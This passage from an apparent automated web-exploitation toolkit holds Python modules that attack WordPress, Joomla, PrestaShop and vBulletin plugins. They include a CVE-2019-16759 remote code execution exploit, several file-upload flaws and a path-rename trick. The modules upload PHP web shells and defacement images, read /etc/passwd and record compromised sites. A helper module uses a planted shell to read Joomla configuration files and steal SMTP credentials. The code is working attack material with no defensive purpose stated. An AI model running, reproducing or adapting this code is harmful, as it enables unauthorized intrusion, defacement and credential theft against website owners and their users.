23 |         CheckIndex = requests.get('http://' + site + '/_input_3_neko.htm', timeout=5, headers=Headers)
24 |         CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_neko.htm',
25 |                                    timeout=5, headers=Headers)
26 |         if 'neko!!' in str(CheckIndex.content):
27 |             with open('result/Index_results.txt', 'a') as writer:
28 |                 writer.write(site + '/_input_3_neko.htm' + '\n')
29 |             return printModule.returnYes(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress')
30 |         elif 'neko!!' in str(CheckIndex2.content):
31 |             with open('result/Index_results.txt', 'a') as writer:
32 |                 writer.write(site + '/wp-content/_input_3_neko.htm' + '\n')
33 |             return printModule.returnYes(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress')
34 |         else:
35 |             return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress')
36 |     except:
37 |         return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress')
38 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2019_16759vBulletinRCE.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     payloadshell = '"neko!!<?php {});?>"'.format("system({}".format('$_GET["cmd"]'))
17 |     ShellPayload = "echo shell_exec(\'echo {} > neko.php\'); exit;".format(payloadshell)
18 |     ChecknekoPayload = {'widgetConfig[code]': 'echo shell_exec(\'cat /etc/passwd\');exit;'}
19 |     params = {"routestring":"ajax/render/widget_php"}
20 |     params["widgetConfig[code]"] = "{}".format(ChecknekoPayload)
21 |     try:
22 |         resp = requests.post('http://' + site, data=params, timeout=10, headers=Headers)
23 |         if 'root:x:' in str(resp.content):
24 |             with open('result/vBulletinRCE_OK.txt', 'a') as writer:
25 |                 writer.write(site + ' --> CVE-2019-16759 nekoerable' + '\n')
26 |             try:
27 |                 params2 = {"routestring": "ajax/render/widget_php"}
28 |                 params2["widgetConfig[code]"] = "{}".format(ShellPayload)
29 |                 requests.post('http://' + site, data=params2, timeout=10, headers=Headers)
30 |                 Checkshell = requests.get('http://{}/neko.php'.format(site), timeout=10, headers=Headers)
31 |                 if 'neko!!' in str(Checkshell.content):
32 |                     with open('result/Shell_results.txt', 'a') as writer:
33 |                         writer.write(site + '/neko.php?cmd=id' + '\n')
34 |                 return printModule.returnYes(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin')
35 |             except:
36 |                 return printModule.returnYes(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin')
37 |         else:
38 |             return printModule.returnNo(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin')
39 |     except:
40 |         return printModule.returnNo(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin')
41 | 


--------------------------------------------------------------------------------
/Exploits/Presta_productpageadverts.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Exp = site + '/modules/productpageadverts/uploadimage.php'
20 |         FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')}
21 |         FileDataShell = {'userfile': open(ShellPresta, 'rb')}
22 |         GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers)
23 |         if 'success' in GoT.content:
24 |             IndexPath = '/modules/productpageadverts/slides/' + Jce_Deface_image.split('/')[1]
25 |             CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers)
26 |             if 'GIF89a' in CheckIndex.content:
27 |                 with open('result/Index_results.txt', 'a') as writer:
28 |                     writer.write(IndexPath + '\n')
29 |                 requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers)
30 |                 ShellPath = '/modules/productpageadverts/slides/' + ShellPresta.split('/')[1]
31 |                 CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers)
32 |                 if 'Vuln!!' in CheckShell.content:
33 |                     with open('result/Shell_results.txt', 'a') as writer:
34 |                         writer.write(ShellPath + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'productpageadverts Module', 'Prestashop')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'productpageadverts Module', 'Prestashop')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'productpageadverts Module', 'Prestashop')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'productpageadverts Module', 'Prestashop')
42 | 


--------------------------------------------------------------------------------
/Tools/getSMTP.py:
--------------------------------------------------------------------------------
 1 | import requests, re
 2 | 
 3 | 
 4 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 5 | 
 6 | def GETSmtpJoomConf(ReadSMtpCnf):
 7 |     try:
 8 |         if 'public $smtpuser =' in ReadSMtpCnf:
 9 |             user = re.findall("smtpuser = '(.*)';", ReadSMtpCnf)[0]
10 |             pw = re.findall("smtppass = '(.*)';", ReadSMtpCnf)[0]
11 |             host = re.findall("smtphost = '(.*)';", ReadSMtpCnf)[0]
12 |             port = re.findall("smtpport = '(.*)';", ReadSMtpCnf)[0]
13 |             if user == '' or user == 'localhost':
14 |                 pass
15 |             else:
16 |                 with open('result/SMTP_Results.txt', 'a') as writer:
17 |                     writer.write(
18 |                         'HostName: {}'.format(host) + '\nuser: {}'.format(user) +
19 |                         '\nPass: {}'.format(pw) + '\nPORT: {}'.format(port) +
20 |                         '\n-----------------------------------------\n')
21 |     except:
22 |         pass
23 | 
24 | def JooomlaSMTPshell(EvalShell):
25 |     try:
26 |         evsh = EvalShell
27 |         EvalShell = EvalShell.split("=")[0] + '='
28 |         if 'system' in evsh:
29 |             pass
30 |         else:
31 |             if EvalShell.startswith('http://'):
32 |                 EvalShell = EvalShell.replace('http://', '')
33 |             elif EvalShell.startswith("https://"):
34 |                 EvalShell = EvalShell.replace('https://', '')
35 |             else:
36 |                 pass
37 |             path0 = EvalShell.split('/')[1]
38 |             a = requests.get('http://{}'.format(EvalShell) + "echo '||';pwd;echo '||';", timeout=10, headers=Headers)
39 |             path = str(a.content).split('||')[1]
40 |             lastpath = path.split(path0)[0]
41 |             try:
42 |                 lastpath = lastpath.split('\n')[1]
43 |             except:
44 |                 pass
45 |             x = "echo '||';cd {};cat configuration.php;echo '||';".format(str(lastpath))
46 |             ReadSMtpCnf = requests.get('http://{}/'.format(EvalShell) + x)
47 |             GETSmtpJoomConf(str(ReadSMtpCnf.content))
48 |     except:
49 |         pass


--------------------------------------------------------------------------------
/Exploits/CVE_2014_4725wysija.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | MailPoetZipShell = 'files/rock.zip'
 6 | Headers = {
 7 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 8 | }
 9 | 
10 | def Exploit(site):
11 |     try:
12 |         FileShell = {'my-theme': open(MailPoetZipShell, 'rb')}
13 |         PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
14 |                     'page': 'GZNeFLoZAb'}
15 |         UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
16 |         url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
17 |         GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
18 |         if 'page=wysija_campaigns&amp;action=themes&amp;reload=1' in str(GoT.content):
19 |             sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
20 |             index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
21 |             CheckShell = requests.get(sh, timeout=10, headers=Headers)
22 |             CheckIndex = requests.get(index, timeout=10, headers=Headers)
23 |             if 'Vuln!!' in str(CheckShell.content):
24 |                 with open('result/Shell_results.txt', 'a') as writer:
25 |                     writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
26 |                 if 'GIF89a' in str(CheckIndex.content):
27 |                     with open('result/Index_results.txt', 'a') as writer:
28 |                         writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
29 |                 return printModule.returnYes(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
30 |             else:
31 |                 return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
32 |         else:
33 |             return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
34 |     except:
35 |         return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
36 | 


--------------------------------------------------------------------------------
/Exploits/Com_civicrm.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | from Tools import wsoShellUploaderModule
 6 | 
 7 | payloadshell = '"neko!!<?php {});?>"'.format("system({}".format('$_GET["cmd"]'))
 8 | Headers = {
 9 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
10 | }
11 | 
12 | 
13 | def Exploit(site):
14 |     try:
15 |         requests.post('http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
16 |                                          'php-ofc-library/ofc_upload_image.php?name=neko.php',
17 |                       data=payloadshell, headers=Headers, timeout=10)
18 |         Exp = requests.get('http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
19 |                                               'tmp-upload-images/neko.php',
20 |                            headers=Headers, timeout=10)
21 |         if 'neko!!' in str(Exp.content):
22 |             with open('result/Shell_results.txt', 'a') as writer:
23 |                 writer.write(site + '/administrator/components/com_civicrm/civicrm/packages/'
24 |                                     'OpenFlashChart/tmp-upload-images/neko.php?cmd=uname -a' + '\n')
25 |                 getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_civicrm/civicrm/packages/'
26 |                                                 'OpenFlashChart/tmp-upload-images/neko.php?cmd=id')
27 |                 WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_civicrm/civicrm/packages/'
28 |                                                               'OpenFlashChart/tmp-upload-images/neko.php?cmd=id')
29 |                 if WSo == 'No':
30 |                     pass
31 |                 else:
32 |                     with open('result/WSo_Shell.txt', 'a') as Wr:
33 |                         Wr.write('{}\n'.format(WSo))
34 |             return printModule.returnYes(site, 'N/A', 'Com_civicrm', 'Joomla')
35 |         else:
36 |             return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
37 |     except:
38 |         return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
39 | 


--------------------------------------------------------------------------------
/Exploits/WooCommerce_ProductAddonsExp.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
18 |         Postdata = {'action': 'nm_personalizedproduct_upload_file', 'name': 'upload.php'}
19 |         FileData = {'file': ('settings_auto.php', open('files/settings_auto.php', 'rb'),
20 |                              'multipart/form-data')}
21 |         GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=10, headers=Headers)
22 |         if GoT.status_code == 200 or 'success' in GoT.content:
23 |             UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php'
24 |             CheckShell = requests.get(UploadPostPath, timeout=10, headers=Headers)
25 |             if 'neko!!' in CheckShell.content:
26 |                 shellChecker = requests.get('http://' + site + '/wp-content/neko.php',
27 |                                             timeout=10, headers=Headers)
28 |                 if 'neko!!' in shellChecker.content:
29 |                     with open('result/Shell_results.txt', 'a') as writer:
30 |                         writer.write(site + '/wp-content/neko.php' + '\n')
31 |                 IndexCheck = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
32 |                 if 'neko!!' in IndexCheck.content:
33 |                     with open('result/Index_results.txt', 'a') as writer:
34 |                         writer.write(site + '/neko.htm' + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress')
42 | 


--------------------------------------------------------------------------------
/Exploits/Presta_tdpsthemeoptionpanel.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
19 |     try:
20 |         Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers)
21 |         if Checkvuln.status_code == 200:
22 |             FileDataIndex = {'image_upload': open(Jce_Deface_image, 'rb')}
23 |             FileDataShell = {'image_upload': open(ShellPresta, 'rb')}
24 |             uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + Jce_Deface_image.split('/')[1]
25 |             uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + ShellPresta.split('/')[1]
26 |             requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers)
27 |             CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers)
28 |             if 'GIF89a' in CheckIndex.content:
29 |                 with open('result/Index_results.txt', 'a') as writer:
30 |                     writer.write(uploadedPathIndex + '\n')
31 |                 requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers)
32 |                 Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers)
33 |                 if 'Vuln!!' in Checkshell.content:
34 |                     with open('result/Shell_results.txt', 'a') as writer:
35 |                         writer.write(uploadedPathShell + '\n')
36 |                 return printModule.returnYes(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop')
37 |             else:
38 |                 return printModule.returnNo(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop')
39 |         else:
40 |             return printModule.returnNo(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop')
41 |     except:
42 |         return printModule.returnNo(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop')
43 | 


--------------------------------------------------------------------------------
/Exploits/Presta_psmodthemeoptionpanel.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
19 |     try:
20 |         Checkvuln = requests.get('http://' + Exl, timeout=10, headers=Headers)
21 |         if Checkvuln.status_code == 200:
22 |             FileDataIndex = {'image_upload': open(Jce_Deface_image, 'rb')}
23 |             FileDataShell = {'image_upload': open(ShellPresta, 'rb')}
24 |             uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + Jce_Deface_image.split('/')[1]
25 |             uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + ShellPresta.split('/')[1]
26 |             requests.post('http://' + Exl, files=FileDataIndex, timeout=10, headers=Headers)
27 |             CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=10, headers=Headers)
28 |             if 'GIF89a' in CheckIndex.content:
29 |                 with open('result/Index_results.txt', 'a') as writer:
30 |                     writer.write(uploadedPathIndex + '\n')
31 |                 requests.post('http://' + Exl, files=FileDataShell, timeout=10, headers=Headers)
32 |                 Checkshell = requests.get('http://' + uploadedPathShell, timeout=10, headers=Headers)
33 |                 if 'Vuln!!' in Checkshell.content:
34 |                     with open('result/Shell_results.txt', 'a') as writer:
35 |                         writer.write(uploadedPathShell + '\n')
36 |                 return printModule.returnYes(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop')
37 |             else:
38 |                 return printModule.returnNo(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop')
39 |         else:
40 |             return printModule.returnNo(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop')
41 |     except:
42 |         return printModule.returnNo(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop')
43 | 


--------------------------------------------------------------------------------
/Exploits/WP_User_Frontend.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, time
 3 | from Exploits import printModule
 4 | 
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
14 | year = time.strftime("%y")
15 | month = time.strftime("%m")
16 | 
17 | def Exploit(site):
18 |     try:
19 |         CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload',
20 |                                  timeout=5, headers=Headers)
21 |         if 'error' in CheckVuln.content or CheckVuln.status_code == 200:
22 |             post = {}
23 |             UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
24 |             post['action'] = 'wpuf_file_upload'
25 |             files = {'wpuf_file': open('files/pwn.gif', 'rb')}
26 |             try:
27 |                 _url = 'http://' + site + "/wp-admin/admin-ajax.php"
28 |                 _open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10)
29 |                 if 'image][]' in _open.content:
30 |                     _Def = site + "/wp-content/uploads/20" + \
31 |                            year + "/" + month + "/" + 'files/pwn.gif'.split('/')[1]
32 |                     Check_Deface = requests.get('http://' + _Def, timeout=5, headers=Headers)
33 |                     if 'GIF89a' in Check_Deface.content:
34 |                         with open('result/Index_results.txt', 'a') as writer:
35 |                             writer.write(_Def + '\n')
36 |                         return printModule.returnYes(site, 'N/A', 'WP User Frontend', 'Wordpress')
37 |                     else:
38 |                         return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress')
39 |                 else:
40 |                     return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress')
41 |             except:
42 |                 return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress')
43 |         else:
44 |             return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress')
45 |     except:
46 |         return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress')
47 | 


--------------------------------------------------------------------------------
/Exploits/Presta_wdoptionpanel.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php'
19 |     try:
20 |         Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers)
21 |         if Checkvuln.status_code == 200:
22 |             PostData = {'data': 'bajatax',
23 |                         'type': 'image_upload'}
24 |             FileDataIndex = {'bajatax': open(Jce_Deface_image, 'rb')}
25 |             FileDataShell = {'bajatax': open(ShellPresta, 'rb')}
26 |             uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + Jce_Deface_image.split('/')[1]
27 |             uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + ShellPresta.split('/')[1]
28 |             requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5, headers=Headers)
29 |             CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers)
30 |             if 'GIF89a' in CheckIndex.content:
31 |                 with open('result/Index_results.txt', 'a') as writer:
32 |                     writer.write(uploadedPathIndex + '\n')
33 |                 requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5, headers=Headers)
34 |                 Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers)
35 |                 if 'Vuln!!' in Checkshell.content:
36 |                     with open('result/Shell_results.txt', 'a') as writer:
37 |                         writer.write(uploadedPathShell + '\n')
38 |                 return printModule.returnYes(site, 'N/A', 'wdoptionpanel Module', 'Prestashop')
39 |             else:
40 |                 return printModule.returnNo(site, 'N/A', 'wdoptionpanel Module', 'Prestashop')
41 |         else:
42 |             return printModule.returnNo(site, 'N/A', 'wdoptionpanel Module', 'Prestashop')
43 |     except:
44 |         return printModule.returnNo(site, 'N/A', 'wdoptionpanel Module', 'Prestashop')
45 | 


--------------------------------------------------------------------------------
/Exploits/printModule.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | r = '\033[31m'
 3 | g = '\033[32m'
 4 | y = '\033[33m'
 5 | b = '\033[34m'
 6 | m = '\033[35m'
 7 | c = '\033[36m'
 8 | w = '\033[37m'
 9 | 
10 | def Print_Scanning(url, CMS):
11 |     print(r + '    [' + y + '*' + r + '] ' + c + url + w + ' [ ' + CMS + ' ]')
12 | 
13 | 
14 | def Timeout(url):
15 |     print(r + '    [' + y + '*' + r + '] ' + c + url + r + ' [ TimeOut!!/NotValid Url ]')
16 | 
17 | 
18 | def Print_NotVuln(NameVuln, site):
19 |     print(c + '       [' + y + '-' + c + '] '
20 |           + r + site + ' ' + y + NameVuln + c + ' [Not Vuln]')
21 | 
22 | 
23 | def Print_Username_Password(username, Password):
24 |     print(y + '           [' + c + '+' + y + '] ' + c + 'Username: ' + g + username)
25 |     print(y + '           [' + c + '+' + y + '] ' + c + 'Password: ' + g + Password)
26 | 
27 | 
28 | def Print_Vuln(NameVuln, site):
29 |     print(c + '       [' + y + '+' + c + '] ' + r + site + ' ' +
30 |           y + NameVuln + g + ' [Vuln!!]')
31 | 
32 | 
33 | def Print_Vuln_index(indexPath):
34 |     print(c + '       [' + y + '+' + c + '] ' + y + indexPath + g + ' [Index Uploaded!]')
35 | 
36 | 
37 | def Print_vuln_Shell(shellPath):
38 |     print(c + '       [' + y + '+' + c + '] '
39 |           + y + shellPath + g + ' [Shell Uploaded!]')
40 | 
41 | def Print_vuln_Config(site):
42 |     print(c + '       [' + y + '+' + c + '] ' + y + site + g + ' [Config Downloaded!]')
43 | 
44 | 
45 | 
46 | def returnYes(target, CVE, Name, CMS):
47 |     return ['{}{}{}'.format(y, target, w), '{}{}{}'.format(c, CVE, w),
48 |             '{}{}{}'.format(w, Name, w), '{}YES{}'.format(g, w), '{}{}{}'.format(c, CMS, w)]
49 | 
50 | def returnNo(target, CVE, Name, CMS):
51 |     return ['{}{}{}'.format(y, target, w), '{}{}{}'.format(c, CVE, w),
52 |             '{}{}{}'.format(w, Name, w), '{}NO{}'.format(r, w), '{}{}{}'.format(c, CMS, w)]
53 | 
54 | 
55 | 
56 | '''
57 | ScannedRez = [['google.com','CVE-2015-1579','revslider', '{}YES{}'.format(g, w), 'Wordpress'],
58 |               ['google.com','CVE-2015-1579','revslider', '{}NO{}'.format(r, w), 'Wordpress'],
59 |               ['google.com','CVE-2015-1579','revslider', '{}NO{}'.format(r, w), 'Wordpress']]
60 | 
61 | t = PrettyTable(['TARGET', 'CVE', 'Name', 'Vulnerable', 'CMS'])
62 | for rez in ScannedRez:
63 |     t.add_row(rez)
64 | 
65 | print t
66 | 
67 | '''
68 | 
69 | 


--------------------------------------------------------------------------------
/Exploits/Com_JCE.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | _shell = 'files/shell.jpg'
14 | 
15 | 
16 | def Exploit(site):
17 |     try:
18 |         fileShell = {'Filedata': open(_shell, 'rb')}
19 |         post_data = {'upload-dir': '/', 'upload-overwrite': '0', 'action': 'upload'}
20 |         Exp = 'http://' + site + \
21 |               '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
22 |         Post = requests.post(Exp, files=fileShell, data=post_data, timeout=10, headers=Headers)
23 |         OtherMethod = '"text":"' + _shell.split('/')[1] + '"'
24 |         if OtherMethod in str(Post.content):
25 |             PrivMethod = {'json': "{\"fn\":\"folderRename\",\"args\":[\"/" + _shell.split('/')[1]
26 |                                   + "\",\"./../../images/neko.php\"]}"}
27 |             try:
28 |                 privExploit = 'http://' + site + '/index.php?option=com_jce&task=' \
29 |                                                  'plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
30 |                 requests.post(privExploit, data=PrivMethod, timeout=10, headers=Headers)
31 |                 try:
32 |                     nekoCheck = requests.get('http://' + site + '/images/neko.php', timeout=10, headers=Headers)
33 |                     if 'neko!!' in str(nekoCheck.content):
34 |                         with open('result/Shell_results.txt', 'a') as writer:
35 |                             writer.write(site + '/images/neko.php' + '\n')
36 |                         return printModule.returnYes(site, 'N/A', 'Com_JCE Shell', 'Joomla')
37 |                     else:
38 |                         return printModule.returnNo(site, 'N/A', 'Com_JCE Shell', 'Joomla')
39 |                 except:
40 |                     return printModule.returnNo(site, 'N/A', 'Com_JCE Shell', 'Joomla')
41 |             except:
42 |                 return printModule.returnNo(site, 'N/A', 'Com_JCE Shell', 'Joomla')
43 |         else:
44 |             return printModule.returnNo(site, 'N/A', 'Com_JCE Shell', 'Joomla')
45 |     except:
46 |         return printModule.returnNo(site, 'N/A', 'Com_JCE Shell', 'Joomla')
47 | 


--------------------------------------------------------------------------------
/Exploits/Com_extplorer.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | # str(
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
14 | ShellPresta = 'files/up.php'
15 | Jce_Deface_image = 'files/pwn.gif'
16 | 
17 | 
18 | def Exploit(site):
19 |     try:
20 |         Check = requests.get('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
21 |                              timeout=10, headers=Headers)
22 |         if Check.status_code == 200 or Check.status_code == 500:
23 |             IndeX = {'Filedata': open(Jce_Deface_image, 'rb')}
24 | 
25 |             ShellFile = {'Filedata': open(ShellPresta, 'rb')}
26 |             requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
27 |                           files=ShellFile, timeout=10, headers=Headers)
28 |             CheckShell = requests.get('http://' + site +
29 |                                       '/images/stories/up.php', timeout=10, headers=Headers)
30 | 
31 |             if 'Vuln!!' in str(CheckShell.content):
32 |                 with open('result/Shell_results.txt', 'a') as writer:
33 |                     writer.write(site + '/images/stories/up.php\n')
34 |                 return printModule.returnYes(site, 'N/A', 'Com_extplorer', 'Joomla')
35 |             else:
36 |                 requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
37 |                               files=IndeX, timeout=10, headers=Headers)
38 | 
39 |                 CheckIndex = requests.get('http://' + site + '/images/stories/' + Jce_Deface_image.split('/')[1],
40 |                                           headers=Headers, timeout=10)
